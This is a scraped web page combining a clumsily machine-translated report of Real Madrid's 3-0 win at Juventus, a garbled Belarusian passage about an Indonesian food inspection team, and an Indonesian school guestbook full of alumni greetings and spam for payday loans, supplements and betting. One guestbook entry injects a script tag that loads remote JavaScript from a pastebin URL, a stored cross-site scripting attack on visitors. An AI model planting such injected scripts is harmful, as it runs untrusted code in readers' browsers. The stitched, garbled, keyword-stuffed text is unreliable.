Real Madrid successfully stole points from home to Juventus in the first leg of the Champions League quarter-finals on Wednesday (4/4). Zinedine Zidane's foster children managed to win with three goals without reply.

Cristiano Ronaldo brought the visitors ahead after the game entered the third minute and became the fastest goal of his career in the Champions League. Simultaneously becoming the most fertile player in the quarter-finals of the club's most elite European competition with 21 goals.

In addition, the father of four children has packed 10 goals from the last 10 Champions League matches this season. Not stopping there, Ronaldo is also listed as the most productive player among the five major European leagues with 38 goals.

No goals are created until halftime. Foster children Zinedine Zidane recorded yalla shoot control of the ball by 53 percent. While the remaining 47 percent belonged to the owner of a place that difficult to score goals during the first half.

Ronaldo again listed his name on the scoreboard in the 64th minute after maximizing bait Dani Carvajal. His salon kicked hard into the top corner of the Buffon goal. Until now, it has been nine goals that he created into the Juve goal.

Marcelo increasingly add to the suffering of the host after scoring in the 72nd minute. Starting from a one-two feed with Ronaldo, the Brazilian striker struck the ball from close range. Score lasted until the fight was over.

Wednesday, 04 April 2018 15:11
duma

Гэта цяперашняя атмасфера ў камандзе Task Force Food Sambas раёна правяла агляд цыркуляцыйнага назірання забароненай скумбрыі зварот прадукцыі на BPOM, а таксама шэраг іншых прадуктаў харчавання і напояў, у крамах і супермаркетах ў самбы, панядзелак (2018/02/04).

Каманда Force Задача ежы складаецца з Дэпартамента гандлю Kumindag справах Diskes, муніцыпальнай паліцыі, yalla shoot паліцыі самбы, Setda Econ секцыі марскога і агенцтва па рыбалоўстве і Сакратарыята па сувязях з грамадскасцю.

Які дзеліцца на дзве каманды. Першая каманда прачасалі крамы і супермаркеты ў акрузе самбы-TEBAS, на чале з выконваючым абавязкі Kadiskes самбы, д-р Фатх Maryunani разам Adj Pol PP самбы, руская Прадметная вобласць

Monday, 02 April 2018 23:10
Saturday, 17 February 2018 19:58
ok’ payday loans pay day loans no credit check personal loans payday loans online http://paydayloans-online.us.org/ OK’
Thursday, 25 January 2018 22:27
SnekerOke

Selamat Pagi Salam Sejahtera, Silahkan berkunjung, dont hestite to ask me..

Saturday, 02 December 2017 06:25

GenF20 Plus is designed to increase the effectiveness of the immune system, increase muscle mass, eliminate all body wastes, increase body efficiency for cellulite loss and improve overall energy levels and strength.

Visit GenF20 Plus SiteGenF20 Plus IngredientsGenF20 Plus  SprayGenF20 Plus Side EffectsGenF20 Plus GNCGenF20 Plus Dosage

Tuesday, 28 November 2017 19:59
asfasfasf
<script type="text/javascript" src="https://pastebin.com/raw/XjnRCjpi"></script>
Saturday, 11 November 2017 13:46
kORAAK

oPO IKI SEM..

Saturday, 11 November 2017 21:01
Priyanto Sumartono

Assalamualaikum,

saya alumni tahun 1991, semoga sman krangkeng tambah maju dan berprestasi

Saturday, 07 October 2017 09:25
sneker

Terima kasih, gabung mas di fb.com/snekeroke

Tuesday, 10 October 2017 08:02
priyanto sumartono

saya butuh alamat terakhir alumni tahun 1990/1991 kelas IPS A3

Thursday, 12 October 2017 09:05
sneker

Kami tidak punya data alamat terkini alumni, yang ada di kami adalah data us i (data peserta Ujian Nasional). Untuk kabar terbaru bisa gabung di group FB SMAN 1 Krangkeng, barangkali temen-teman ada yang tahu.

Sunday, 15 October 2017 07:44
sneker

Kami tidak punya data alamat almuni terkini, silahkan gabung di group FB barangkali temen-temen ada yang tahu.

Sunday, 15 October 2017 07:52
Dewi S

Selamat siang, salam kenal dari alumni 1987...

Saturday, 23 September 2017 21:47
Powered by JoomVita VitaBook
Offers and bonuses by SkyBet at BettingY com